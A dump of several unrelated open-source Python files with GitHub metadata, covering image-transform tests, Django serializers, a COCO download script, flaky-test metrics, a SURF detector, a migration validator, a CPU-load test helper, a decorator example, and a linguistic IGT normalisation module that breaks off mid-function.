tform = AffineTransform()
tform.estimate(src, dst)
assert np.all(np.isnan(tform.params))
tform = ProjectiveTransform()
tform.estimate(src, dst)
assert np.all(np.isnan(tform.params))
if __name__ == "__main__":
from numpy.testing import run_module_suite
run_module_suite()
| {
"content_hash": "3497378381aecde2a24cc096f4293c2f",
"timestamp": "",
"source": "github",
"line_count": 321,
"max_line_length": 77,
"avg_line_length": 33.504672897196265,
"alnum_prop": 0.6710367271036727,
"repo_name": "vighneshbirodkar/scikit-image",
"id": "98bb75243e30ecf22cafc242fc2f67916787bb16",
"size": "10755",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "skimage/transform/tests/test_geometric.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "235642"
},
{
"name": "C++",
"bytes": "44817"
},
{
"name": "Makefile",
"bytes": "567"
},
{
"name": "Python",
"bytes": "2518884"
}
],
"symlink_target": ""
} |
from django.contrib.auth.models import User, Permission
from rest_framework import serializers
from core.models import Client, Project, Entry
from core.fields import DurationField
from core.models import Task
class PermissionSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Permission
fields = ("id", "url", "name", "codename")
class UserSerializer(serializers.HyperlinkedModelSerializer):
perms = serializers.SerializerMethodField()
class Meta:
model = User
fields = (
"id",
"url",
"username",
"is_active",
"is_staff",
"is_superuser",
"perms",
# "groups",
)
def get_perms(self, obj):
perms = {}
if obj.is_superuser:
queryset = Permission.objects.all()
else:
queryset = Permission.objects.filter(user=obj)
for perm in queryset.values():
perms[perm["codename"]] = perm
return perms
class ClientSerializer(serializers.HyperlinkedModelSerializer):
total_projects = serializers.SerializerMethodField()
total_duration = serializers.SerializerMethodField()
class Meta:
model = Client
fields = (
"id",
"url",
"name",
"payment_id",
"archive",
"total_projects",
"total_duration",
)
def get_queryset(self):
queryset = super().get_queryset()
return queryset.filter(archive=False)
def get_total_projects(self, obj):
return obj.get_total_projects()
def get_total_duration(self, obj):
return obj.get_total_duration()
class ProjectSerializer(serializers.HyperlinkedModelSerializer):
total_entries = serializers.SerializerMethodField()
total_duration = serializers.SerializerMethodField()
percent_done = serializers.SerializerMethodField()
class Meta:
model = Project
fields = (
"id",
"url",
"client",
"name",
"archive",
"estimate",
"total_entries",
"total_duration",
"percent_done",
)
def get_queryset(self):
queryset = super().get_queryset()
return queryset.filter(archive=False)
def get_total_entries(self, obj):
return obj.get_total_entries()
def get_total_duration(self, obj):
return obj.get_total_duration()
def get_percent_done(self, obj):
return obj.get_percent_done()
class TaskSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Task
fields = ("id", "url", "name", "hourly_rate")
class EntrySerializer(serializers.HyperlinkedModelSerializer):
duration = DurationField()
class Meta:
model = Entry
fields = (
"id",
"url",
"project",
"task",
"user",
"date",
"duration",
"datetime_start",
"datetime_end",
"note",
)
| {
"content_hash": "3a83398963a097737011b05fc1f31932",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 67,
"avg_line_length": 24.944444444444443,
"alnum_prop": 0.5676105631562202,
"repo_name": "overshard/timestrap",
"id": "478364bd7fe605b57938e7b366716c76b8e6ed42",
"size": "3143",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "api/serializers.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "763"
},
{
"name": "Dockerfile",
"bytes": "478"
},
{
"name": "HTML",
"bytes": "8197"
},
{
"name": "JavaScript",
"bytes": "22880"
},
{
"name": "Python",
"bytes": "245430"
},
{
"name": "Vue",
"bytes": "65581"
}
],
"symlink_target": ""
} |
from pycocotools.coco import COCO
import numpy as np
import skimage.io as io
import os.path
import sys
if len(sys.argv) <= 1:
print("Data Type argument needs to be `val2014` or `train2014`.")
sys.exit(1)
dataDir = './data'
dataType = sys.argv[1]
fdir = '%s/%s' % (dataDir, dataType)
if not os.path.exists(fdir):
os.makedirs(fdir)
annotationFile = '%s/annotations/instances_%s.json' % (dataDir, dataType)
coco = COCO(annotationFile)
catIds = coco.getCatIds(catNms=['stop sign']);
imgIds = coco.getImgIds(catIds=catIds);
i = 1
for val in imgIds:
print("%d / %d" % (i, len(imgIds)))
id = str(val)
fname = '%s/COCO_%s_%s.jpg' % (fdir, dataType, "0" * (12-len(id)) + id)
if not os.path.exists(fname):
img = io.imread('http://mscoco.org/images/%s' % (id))
io.imsave(fname, img)
i += 1
print("Download done")
| {
"content_hash": "478337d09cbdd87aedf201b2fdf7f00d",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 73,
"avg_line_length": 23.885714285714286,
"alnum_prop": 0.6519138755980861,
"repo_name": "pbrazdil/deepmask",
"id": "4db0470277e0579be25c21fcd80a1c66fdfe2862",
"size": "836",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "prepareData.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "3001562"
},
{
"name": "Lua",
"bytes": "87848"
},
{
"name": "Makefile",
"bytes": "199"
},
{
"name": "Python",
"bytes": "61140"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, print_function
import logging
from datetime import datetime, timedelta
from changes.config import db
from changes.db.utils import try_create
from changes.lib.flaky_tests import get_flaky_tests
from changes.models import FlakyTestStat, Project, TestCase
import urllib2
def log_metrics(key, **kws):
try:
urllib2.urlopen(
"https://www.dropbox.com/build_metrics" +
"?key=%s" % key +
"".join(
"&%s=%s" % (urllib2.quote(str(k)), urllib2.quote(str(v)))
for (k, v) in kws.items()
),
timeout=10
).read()
except Exception as e:
print("Logging Failed", e)
pass
def aggregate_flaky_tests(day=None, max_flaky_tests=200):
if day is None:
day = datetime.utcnow().date() - timedelta(days=1)
try:
projects = Project.query.all()
for project in projects:
tests = get_flaky_tests(day, day + timedelta(days=1), [project], max_flaky_tests)
for test in tests:
first_run = db.session.query(
TestCase.date_created
).filter(
TestCase.project_id == test['project_id'],
TestCase.name_sha == test['hash']
).order_by(
TestCase.date_created
).limit(1).scalar()
log_metrics(
"flaky_test_reruns",
flaky_test_reruns_name=test['name'],
flaky_test_reruns_project_id=test['project_id'],
flaky_test_reruns_flaky_runs=test['flaky_runs'],
flaky_test_reruns_passing_runs=test['passing_runs'],
)
try_create(FlakyTestStat, {
'name': test['name'],
'project_id': test['project_id'],
'date': day,
'last_flaky_run_id': test['id'],
'flaky_runs': test['flaky_runs'],
'double_reruns': test['double_reruns'],
'passing_runs': test['passing_runs'],
'first_run': first_run
})
db.session.commit()
except Exception as err:
logging.exception(unicode(err))
| {
"content_hash": "7a5e4dca37c5d577676b575c112d4998",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 93,
"avg_line_length": 32.7887323943662,
"alnum_prop": 0.5094501718213058,
"repo_name": "bowlofstew/changes",
"id": "4df60e7770ad40ef21d9f7c80c2e0fc81fe9b5f8",
"size": "2351",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "changes/jobs/flaky_tests.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "87142"
},
{
"name": "HTML",
"bytes": "137437"
},
{
"name": "JavaScript",
"bytes": "385108"
},
{
"name": "Makefile",
"bytes": "6212"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "1546048"
},
{
"name": "Shell",
"bytes": "868"
}
],
"symlink_target": ""
} |
'''
Created on Apr 16, 2009
@author: bolme
'''
from pyvision.point.DetectorROI import DetectorROI
#import pyvision as pv
#from scipy import weave
import cv
def ExtractSURF(im,min_hessian=300):
'''
Uses OpenCV to extract SURF keypoints. Currently does not compute SURF features.
TODO: An option should be added to also compute and return the SURF descriptors.
TODO: This should be extended with options for octaves and levels.
TODO: I believe there are no memory leaks but this should be checked. cvSURFParams?
'''
cvim= im.asOpenCVBW()
#mat = int(cvim.this)
min_hessian = float(min_hessian)
#TODO: OpenCV python interface now includes cv.ExtractSURF(cvim, mask, storage, params)
#This is my (Steve's) attempt at this, but I am concerned we're not returning the
# some of the information once this gets back to the caller...perhaps the parent
# class is filtering out the addtnl data that SURF points provide?
#TODO: Now that we have the descriptors, we need to return them to user if desired.
(keypts, _) = cv.ExtractSURF(cvim, None, cv.CreateMemStorage(), (0, min_hessian, 3, 1))
keypoints = list()
for ((x, y), laplacian, size, direction, hessian) in keypts:
keypoints.append((hessian,x,y,size,direction,laplacian) )
return keypoints
# keypoints = weave.inline(
# '''
# CvMat* im = (CvMat*)mat;
#
# CvMemStorage* storage = cvCreateMemStorage();
# CvSeq* keypoints = cvCreateSeq(0,sizeof(CvSeq),sizeof(CvSURFPoint),storage);
# cvExtractSURF(im,NULL,&keypoints,NULL,storage,cvSURFParams(min_hessian));
#
#
# int n = keypoints->total;
# PyObject* list = PyList_New(n);
# CvSURFPoint pt;
# for(int i = 0 ; i < n; i++){
# cvSeqPop(keypoints,&pt);
#
# PyObject* tuple = PyTuple_New(5);
# PyTuple_SetItem(tuple, 1, PyFloat_FromDouble(pt.pt.x));
# PyTuple_SetItem(tuple, 2, PyFloat_FromDouble(pt.pt.y));
# PyTuple_SetItem(tuple, 3, PyInt_FromLong(pt.size));
# PyTuple_SetItem(tuple, 4, PyFloat_FromDouble(pt.dir));
# PyTuple_SetItem(tuple, 0, PyFloat_FromDouble(pt.hessian));
#
# PyList_SetItem(list,i,tuple);
# //printf("%5d %10.5f %10.5f %5d %10.5f %10.5f\\n", i, pt.pt.x, pt.pt.y, pt.size, pt.dir, pt.hessian);
#
#
# cvClearMemStorage(storage);
# cvReleaseMemStorage(&storage);
#
# return_val = list;
# ''',
# arg_names=['mat','min_hessian'],
# include_dirs=['/usr/local/include'],
# headers=['<opencv/cv.h>'],
# library_dirs=['/usr/local/lib'],
# libraries=['cv']
# )
#return keypoints
class DetectorSURF(DetectorROI):
def __init__(self, min_hessian=400.0, **kwargs):
'''
'''
self.min_hessian = min_hessian
DetectorROI.__init__(self,**kwargs)
def _detect(self,im):
keypoints = ExtractSURF(im,min_hessian=self.min_hessian)
keypoints.sort(lambda x,y: -cmp(x[0],y[0]))
return keypoints
| {
"content_hash": "aee963fcb055756f2e2e62215f3706f6",
"timestamp": "",
"source": "github",
"line_count": 87,
"max_line_length": 114,
"avg_line_length": 36.632183908045974,
"alnum_prop": 0.6027612174458739,
"repo_name": "hitdong/pyvision",
"id": "6c1a7c825f4f982e71347b53cda8b21fcc3058f6",
"size": "3187",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/pyvision/point/DetectorSURF.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "1379814"
},
{
"name": "R",
"bytes": "1487"
},
{
"name": "Shell",
"bytes": "166"
}
],
"symlink_target": ""
} |
import re
import glob
import json
from scripts.migrate_piwik import utils
from scripts.migrate_piwik import settings
def main():
"""Verification of batching/anonymization script.
Asserts:
* Expected number of batch files exist for both public and private collections.
* No extra batch files exist for both public and private collections.
* All of the batch files are part on the current run.
* Number of events is consistent between public and private, and matches up with upstream counts
* No sensitive fields exists in public collections.
"""
run_id = utils.get_history_run_id_for('transform02')
complaints_file = utils.get_complaints_for('transform02', 'w')
complaints_file.write(settings.RUN_HEADER + '{}\n'.format(run_id))
batch_count = utils.get_batch_count()
complaints = 0
print('Validating private data')
complaints += verify_files('private', batch_count, run_id, complaints_file)
print('Validating public data')
complaints += verify_files('public', batch_count, run_id, complaints_file)
if complaints > 0:
print("This is {}.\n\nThat's {} {}!".format(
', '.join(['gross'] * complaints), complaints, 'whole "gross"' if complaints == 1 else '"grosses"'
))
else:
print("You've passed the final challenge! Huzzah, brave warrior!")
def verify_files(domain, batch_count, run_id, complaints_file):
complaints = 0
work_dir = utils.get_dir_for('transform02')
files = glob.glob(work_dir + '/' + domain + '-*.data')
print(' Found {} files.'.format(len(files)))
if batch_count > len(files):
complaints += 1
complaints_file.write('Too many {} files found! got {}, expected {}\n'.format(
domain, len(files), batch_count,
))
elif batch_count < len(files):
complaints += 1
complaints_file.write('Too few {} files found! got {}, expected {}\n'.format(
domain, len(files), batch_count,
))
filenum = 0
lastfile_re = domain + '\-\d*' + str(batch_count) + '\.data'
for filename in files:
filenum += 1
if not filenum % 10:
print(' Working on file: {}'.format(filename))
with open(filename, 'r') as data_file:
file_run_id = data_file.readline().replace(settings.RUN_HEADER, '').rstrip()
if file_run_id != run_id:
complaints += 1
complaints_file.write('Invalid Run ID for {}! got {}, expected {}\n'.format(
filename, file_run_id, run_id,
))
break
events = json.loads(data_file.readline())
if len(events) != settings.BATCH_SIZE and not re.search(lastfile_re, filename):
complaints += 1
complaints_file.write('Not enough events for {}! got {}, expected {}\n'.format(
filename, len(events), settings.BATCH_SIZE,
))
if domain == 'public':
eventnum = 0
for event in events:
eventnum += 1
for event_type in ('tech', 'user', 'visitor', 'geo',):
if hasattr(event, event_type):
complaints += 1
complaints_file.write(
'Event {} in {} has private data! "{}" shouldn\'t be included\n'.format(
eventnum, filename, event_type
)
)
return complaints
if __name__ == "__main__":
main()
| {
"content_hash": "957ba26c7c3da3d001cf8d05e2aaeed3",
"timestamp": "",
"source": "github",
"line_count": 101,
"max_line_length": 110,
"avg_line_length": 35.99009900990099,
"alnum_prop": 0.5570839064649243,
"repo_name": "emetsger/osf.io",
"id": "9c6849b9b52c1c7ba8160e3b6b067504ef2992a0",
"size": "3635",
"binary": false,
"copies": "4",
"ref": "refs/heads/develop",
"path": "scripts/migrate_piwik/validate_after_transform_02.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "160226"
},
{
"name": "HTML",
"bytes": "121662"
},
{
"name": "JavaScript",
"bytes": "1672685"
},
{
"name": "Mako",
"bytes": "660837"
},
{
"name": "Perl",
"bytes": "13885"
},
{
"name": "Python",
"bytes": "6189751"
}
],
"symlink_target": ""
} |
"""This is used by run_tests.py to create cpu load on a machine"""
while True:
pass
| {
"content_hash": "ca7b2d7c942683052477b0772ac782d8",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 66,
"avg_line_length": 21.5,
"alnum_prop": 0.6976744186046512,
"repo_name": "grani/grpc",
"id": "857addfb38658a80f344a75d7526f8c5a1cc5ba0",
"size": "1640",
"binary": false,
"copies": "40",
"ref": "refs/heads/UnityClient.1.2.0",
"path": "tools/run_tests/python_utils/antagonist.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "27445"
},
{
"name": "C",
"bytes": "6164666"
},
{
"name": "C#",
"bytes": "1456440"
},
{
"name": "C++",
"bytes": "1772100"
},
{
"name": "CMake",
"bytes": "78852"
},
{
"name": "DTrace",
"bytes": "147"
},
{
"name": "JavaScript",
"bytes": "352437"
},
{
"name": "M4",
"bytes": "38216"
},
{
"name": "Makefile",
"bytes": "726387"
},
{
"name": "Objective-C",
"bytes": "307089"
},
{
"name": "PHP",
"bytes": "150580"
},
{
"name": "Protocol Buffer",
"bytes": "114504"
},
{
"name": "PureBasic",
"bytes": "147"
},
{
"name": "Python",
"bytes": "1234367"
},
{
"name": "Ruby",
"bytes": "604218"
},
{
"name": "Shell",
"bytes": "56241"
},
{
"name": "Swift",
"bytes": "5418"
}
],
"symlink_target": ""
} |
'''
Created on Aug, 5 2015
@author: mlaptev
'''
class CallCount(object):
'''
This class provides functionality that can be used like a decorator
that calculates how many times decorated method has been called
'''
global_counter = 0
def __init__(self, function):
'''
Constructor
'''
self.function_to_execute = function
def __call__(self, *args):
self.increase_counter()
self.function_to_execute(*args)
@classmethod
def increase_counter(cls):
cls.global_counter += 1
@CallCount
def hello(name):
print "Hello, {}".format(name)
if __name__ == "__main__":
for i in range(10):
hello("Student #{}".format(i + 1))
print "Function has been called {} times".format(CallCount.global_counter) | {
"content_hash": "883489359d78c6c54c3b2f0977f6ccf5",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 78,
"avg_line_length": 23.25,
"alnum_prop": 0.5794504181600956,
"repo_name": "MikeLaptev/sandbox_python",
"id": "da2eaa861add0263f63b970a5826692e0fb0e087",
"size": "837",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mera/closures_and_decorators/class_decorator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Nginx",
"bytes": "591"
},
{
"name": "Python",
"bytes": "190991"
},
{
"name": "Shell",
"bytes": "713"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import sys
import re
import argparse
import logging
try:
from itertools import izip_longest as zip_longest # py2
except ImportError:
from itertools import zip_longest # py3
from xigt.codecs import xigtxml
from xigt import Item, Tier, xigtpath as xp
from odinxigt import (
copy_items,
get_tags,
remove_blank_items,
min_indent,
shift_left
)
BLANK_TAG = 'B'
LANG_CODE_PATH = 'metadata//dc:subject/@olac:code'
LANG_NAME_PATH = 'metadata//dc:subject/text()'
# quote list: https://en.wikipedia.org/wiki/Quotation_mark
QUOTES = (
'\u0022' # quotation mark (")
'\u0027' # apostrophe (')
'\u00ab' # left-pointing double-angle quotation mark
'\u00bb' # right-pointing double-angle quotation mark
'\u2018' # left single quotation mark
'\u2019' # right single quotation mark
'\u201a' # single low-9 quotation mark
'\u201b' # single high-reversed-9 quotation mark
'\u201c' # left double quotation mark
'\u201d' # right double quotation mark
'\u201e' # double low-9 quotation mark
'\u201f' # double high-reversed-9 quotation mark
'\u2039' # single left-pointing angle quotation mark
'\u203a' # single right-pointing angle quotation mark
'\u300c' # left corner bracket
'\u300d' # right corner bracket
'\u300e' # left white corner bracket
'\u300f' # right white corner bracket
'\u301d' # reversed double prime quotation mark
'\u301e' # double prime quotation mark
'\u301f' # low double prime quotation mark
'\ufe41' # presentation form for vertical left corner bracket
'\ufe42' # presentation form for vertical right corner bracket
'\ufe43' # presentation form for vertical left corner white bracket
'\ufe44' # presentation form for vertical right corner white bracket
'\uff02' # fullwidth quotation mark
'\uff07' # fullwidth apostrophe
'\uff62' # halfwidth left corner bracket
'\uff63' # halfwidth right corner bracket
)
# note: adding grave accent (`) and comma (,) as they've been observed
# serving as quotes
# edit: commented out (grave sometimes closes, frequently opens)
QUOTEPAIRS = {
'\u0022': ['\u0022'], # quotation mark (")
'\u0027': ['\u0027'], # apostrophe (')
#'\u002c': ['\u0027', '\u0060'], # comma/(apostrophe|grave-accent)
'\u0060': ['\u0027'], # grave-accent/apostrophe
'\u00ab': ['\u00bb'], # left/right-pointing double-angle quotation mark
'\u00bb': ['\u00ab', '\u00bb'], # right/(left|right)-pointing double-angle quotation mark
'\u2018': ['\u2019'], # left/right single quotation mark
'\u2019': ['\u2019'], # right single quotation mark
'\u201a': ['\u201b', '\u2018', '\u2019'], # single low-9/(high-reversed-9|left-single|right-single) quotation mark
'\u201b': ['\u2019'], # single high-reversed-9/right-single quotation mark
'\u201c': ['\u201d'], # left/right double quotation mark
'\u201d': ['\u201d'], # right double quotation mark
'\u201e': ['\u201c', '\u201d'], # double-low-9/(left-double|right-double) quotation mark
'\u201f': ['\u201d'], # double-high-reversed-9/right-double quotation mark
'\u2039': ['\u203a'], # single left/right-pointing angle quotation mark
'\u203a': ['\u2039', '\u203a'], # single right/(left|right)-pointing angle quotation mark
'\u300c': ['\u300d'], # left/right corner bracket
'\u300e': ['\u300f'], # left/right white corner bracket
'\u301d': ['\u301e'], # reversed/* double prime quotation mark
'\u301f': ['\u301e'], # low/* double prime quotation mark
'\ufe41': ['\ufe42'], # presentation form for vertical left/right corner bracket
'\ufe43': ['\ufe44'], # presentation form for vertical left/right corner white bracket
'\uff02': ['\uff02'], # fullwidth quotation mark
'\uff07': ['\uff07'], # fullwidth apostrophe
'\uff62': ['\uff63'] # halfwidth left/right corner bracket
}
OPENQUOTES = ''.join(QUOTEPAIRS.keys())
CLOSEQUOTES = ''.join(q for qs in QUOTEPAIRS.values() for q in qs)
def normalize_corpus(xc):
for igt in xc:
base_tier = None
norm_tier = None
for tier in igt:
if tier.type == 'odin':
state = tier.attributes.get('state')
# don't get raw tier if cleaned exists
if base_tier is None and state == 'raw':
base_tier = tier
elif state == 'cleaned':
base_tier = tier
elif state == 'normalized':
norm_tier = tier
if base_tier is None:
logging.info(
'No cleaned tier found for normalizing for IGT with id: {}'
.format(str(igt.id))
)
elif norm_tier is not None:
logging.warning(
'Normalized tier already found for IGT with id: {}'
.format(str(igt.id))
)
else:
add_normalized_tier(igt, base_tier)
def add_normalized_tier(igt, base_tier):
norm_id = None
# check if ID is available
for n_id in ('n', 'on', 'normalized', 'odin-normalized'):
if igt.get(n_id) is None:
norm_id = n_id
break
if norm_id is None:
logging.warning(
'No preset ID for normalized tier was available '
'for IGT with id: {}'
.format(str(igt.id))
)
else:
norm_items = normalize_items(base_tier, norm_id)
tier = Tier(
id=norm_id,
type='odin',
alignment=base_tier.id,
attributes={'state': 'normalized'},
items=norm_items
)
igt.append(tier)
def normalize_items(base_tier, norm_id):
# first make copies of the original items
items = copy_items(base_tier.items)
items = remove_blank_items(items) # don't bother with blank lines
items = rejoin_continuations(items)
items = rejoin_translations(items)
items = remove_citations(items)
items = remove_language_name(items, base_tier.igt)
items = remove_example_numbers(items)
items = remove_blank_items(items) # in case previous created blanks
for item in items:
# and set the copy's alignments to their current ID (changed later)
item.alignment = item.id
rejoin_hyphenated_grams(item)
extract_judgment(item)
# any remaining tag=B items should be changed to tag=M
# (because they aren't blank)
tags = get_tags(item)
if tags[0] == 'B':
tags = ['M'] + tags[1:]
item.attributes['tag'] = '+'.join(tags)
items = separate_secondary_translations(items)
items = dewrap_lines(items)
items = unquote_translations(items)
items = shift_left(items, tags=('L','G','L-G','L-T','G-T','L-G-T'))
for i, item in enumerate(items):
item.id = '{}{}'.format(norm_id, i + 1)
return items
def whitespace(m):
start, end = m.span()
return ' ' * (end - start)
def merge_items(*items):
alignment = ','.join(i.alignment for i in items if i.alignment)
content = ','.join(i.content for i in items if i.content)
segmentation = ','.join(i.segmentation for i in items if i.segmentation)
if segmentation and (alignment or content):
raise ValueError(
'Cannot merge items defining segmentation and another '
'reference attribute.'
)
base = items[0]
base.text = ' '.join(i.text for i in items)
base.attributes['line'] = ' '.join(i.attributes['line'] for i in items)
if alignment: base.alignment = alignment
if content: base.content = content
if segmentation: base.segmentation = segmentation
pri_tags = set()
sec_tags = set()
for item in items:
tags = get_tags(item)
if tags[0]:
pri_tags.add(tags[0])
sec_tags.update(tags[1:])
tag = '-'.join(sorted(pri_tags)).replace('G-L', 'L-G')
if sec_tags:
tag = '{}+{}'.format(tag, '+'.join(sorted(sec_tags)))
base.attributes['tag'] = tag
def rejoin_continuations(items):
new_items = []
for item in items:
tags = get_tags(item)
if tags[0] == 'C' and new_items:
item.text = item.text.lstrip()
item.attributes['tag'] = item.attributes['tag'][1:] # remove C
merge_items(new_items[-1], item)
else:
new_items.append(item)
return new_items
def rejoin_translations(items):
# rejoin translation lines if they don't start with some kind of
# speaker indicator, quote, or other
new_items = []
prev_is_t = False
prev_end = False
for item in items:
tags = get_tags(item)
is_t = tags[0] == 'T' and 'DB' not in tags and 'CR' not in tags
marked = re.match(
r'^\s*[(\[]?\s*\S+\s*\.?\s*[)\]]?\s*:', item.text, re.U
)
if prev_is_t and is_t and not marked and not prev_end:
item.text = item.text.lstrip()
merge_items(new_items[-1], item)
else:
new_items.append(item)
prev_is_t = is_t
end_match = re.search(r'[{}] *\)* *$'.format(CLOSEQUOTES), item.text)
prev_end = end_match is not None
return new_items
citation_re = re.compile(
r'(\s{3}( [-a-zA-Z]+){1,4} ?|=?)'
'('
r'\[(?P<inner1>([^\]]*(\([^\)]*\))?)[0-9]*([^\]]*(\([^)]*\))?))\]'
r'|'
r'\((?P<inner2>([^)]*(\([^)]*\))?)[0-9]*([^)]*(\([^)]*\))?))\)'
')'
r'\s*$',
re.U
)
def remove_citations(items):
def removable(m, t, i):
# citation matches are removable if they don't look like
# translation alternates or bracketed glosses
if t in ('L', 'G'):
start, end = m.span()
other = None
if t == 'L': # look down then up for nearest G
others = items[i+1:] + items[i-1::-1]
t2 = 'G'
else: # look up then down for nearest L
others = items[i-1:] + items[i-1::-1]
t2 = 'L'
other = next((i for i in others if get_tags(i)[0] == t2), None)
if other and (other.text or '')[start:end].strip() != '':
return False
elif re.match(r'\s*[{}].*[{}]\s*$'.format(OPENQUOTES, CLOSEQUOTES),
m.group('inner1') or m.group('inner2'),
re.U):
return False
return True
new_items = []
for i, item in enumerate(items):
new_items.append(item) # add now; text might be modified later
tags = get_tags(item)
if tags[0] not in ('L', 'G', 'T', 'L-G', 'L-T', 'L-G-T'):
continue
match = citation_re.search(item.text)
if (match and removable(match, tags[0], i)):
meta_item = Item(id=item.id,
text=match.group(0).strip(),
attributes=item.attributes)
m_tags = ['M']
item.text = citation_re.sub('', item.text).rstrip()
if 'AC' in tags:
tags.remove('AC')
m_tags.append('AC')
elif 'LN' in tags:
tags.remove('LN')
m_tags.append('LN')
elif 'CN' in tags:
tags.remove('CN')
m_tags.append('CN')
# what about other tags? LN, CN, EX
item.attributes['tag'] = '+'.join(tags)
meta_item.attributes['tag'] = '+'.join(m_tags)
new_items.append(meta_item)
return new_items
def remove_language_name(items, igt):
new_items = []
lgcode = xp.find(igt, LANG_CODE_PATH)
lgname = xp.find(igt, LANG_NAME_PATH)
lgtoks = []
if lgcode and '?' not in lgcode and '*' not in lgcode:
codes = set(lgcode.split(':')) # split up complex codes
codes.update(map(str.upper, list(codes)))
codes.update(map(str.lower, list(codes)))
lgtoks.extend(codes)
if lgname and '?' not in lgname:
lgtoks.append(lgname)
lgtoks.append(lgname.upper())
if re.search('[- ]', lgname, re.U): # abbreviation for multiword names
lgtoks.append(''.join(ln[0]
for ln in re.split(r'[- ]+', lgname, re.U)))
if re.search(r'^\w{3}', lgname, re.U):
lgtoks.append(lgname[:3])
if lgtoks:
sig = '|'.join(re.escape(t) for t in lgtoks)
start_lg_re = re.compile(r'^\s*[(\[]?({})[)\]]?'
.format(sig), re.U)
end_lg_re = re.compile(r'[(\[]?({})[)\]]?\s*$'
.format(sig), re.U)
for item in items:
new_items.append(item) # add now; might be modified later
tags = get_tags(item)
if tags[0] != 'M':
orig = item.text
m = start_lg_re.match(item.text)
if m:
meta_item = Item(id=item.id,
text=m.group(0).strip(),
attributes=dict(item.attributes))
meta_item.attributes['tag'] = 'M+LN'
new_items.append(meta_item)
item.text = start_lg_re.sub(whitespace, item.text)
m = end_lg_re.search(item.text)
if m:
meta_item = Item(id=item.id,
text=m.group(0).strip(),
attributes=dict(item.attributes))
meta_item.attributes['tag'] = 'M+LN'
items.append(meta_item)
item.text = end_lg_re.sub(whitespace, item.text).rstrip()
if 'LN' in tags and item.text != orig:
tags.remove('LN')
item.attributes['tag'] = '+'.join(tags)
else:
new_items = items
return new_items
ex_num_re = re.compile(
'^(?P<exnum>'
r'\s*'
r'(?P<paren>[(\[])?\s*'
r'(?P<pre>ex|\w)?'
r'(?(pre)[\d.]+|([\d.]+\w?|\w|[ivxlc]+))'
r'(?(paren)[\'.]*|[\'.)])'
r'(?(paren)\s*[)\]])'
')' # end exnum
r'\s',
re.I|re.U
)
def remove_example_numbers(items):
# IGT-initial numbers (e.g. '1.' '(1)', '5a.', '(ii)')
def removable(m):
start, end = m.span()
end -= 1 # ignore the required final space
mtext = m.group('exnum')
for item in items:
tags = get_tags(item)
if tags[0] not in ('L', 'G', 'T', 'L-G', 'G-T', 'L-T', 'L-G-T'):
continue
text = (item.text or '')[start:end]
if text != mtext and text.strip() != '':
return False
return True
for item in items:
tags = get_tags(item)
if tags[0] in ('L-G', 'L-T', 'G-T', 'L-G-T'):
item.text = ex_num_re.sub(whitespace, item.text)
elif tags[0] in ('L', 'G', 'T'):
m = ex_num_re.match(item.text)
while m and removable(m):
item.text = ex_num_re.sub(whitespace, item.text)
m = ex_num_re.match(item.text)
return items
# def remove_precontent_tags(item):
# # precontent tags can be 1 or 2 words ("intended:" or "speaker", "a:")
# # ignore those with 3 or more
# item.text = re.sub(r'^\s*\w+(\s\w+)?\s*:\s', '', item.text)
def rejoin_hyphenated_grams(item):
# there may be morphemes separated by hyphens, but with intervening
# spaces; slide the token over (e.g. "dog- NOM" => "dog-NOM ")
tags = get_tags(item)
delims = {
'L': '-=',
'L-G': '-=',
'G': '-=.'
}
if tags[0] in delims:
pattern = r'(\S*(?:\s*[{}]\s*\S*)+)'.format(delims[tags[0]])
text = item.text
toks = []
pos = 0
for match in list(re.finditer(pattern, text, re.U)):
start, end = match.span()
toks.append(text[pos:start])
toks.append(text[start:end].replace(' ', ''))
pos = end
toks.append(text[pos:len(text)])
item.text = ''.join(toks).rstrip()
# judgment extraction adapted from code from Ryan Georgi (PC)
# don't attempt for still-corrupted lines or those with alternations
# (detected by looking for '/' in the string)
def extract_judgment(item):
tags = get_tags(item)
if tags[0] == 'M' or 'CR' in tags:
return
match = re.match(r'^\s*([*?#]+)[^/]+$', item.text, re.U)
if match:
item.attributes['judgment'] = match.group(1)
item.text = re.sub(r'^(\s*)[*?#]+\s*', r'\1', item.text, re.U)
# BEWARE: regex magic below
# (?P<name>...) makes a named group
# (?P(name)abc|xyz) is conditional; if name matched, do abc, else xyz
basic_quoted_trans_re = re.compile(
r'(^|[[ (])'
'(?P<t>'
r'(?P<judg>[*?#]+)?'
r'((?P<cm>,,?)|(?P<oq>[{oq}]))' # if starting quote is , end might be `
r'(s\' \w|\'\w|{oq}\w|[\w,]{cq},? \w+ \w+|[^{cq}{oq}])+' # string content
r'((?(oq)([{cq}]|[^{oq}]*|\s*$)|(?(cm)[{cq}`]|[^{oq}]*)))' # end
')' # end t group
r'($|[ )\]])'
.format(oq=OPENQUOTES, cq=CLOSEQUOTES),
re.I|re.U
)
def separate_secondary_translations(items):
# sometimes translation lines with secondary translations are marked
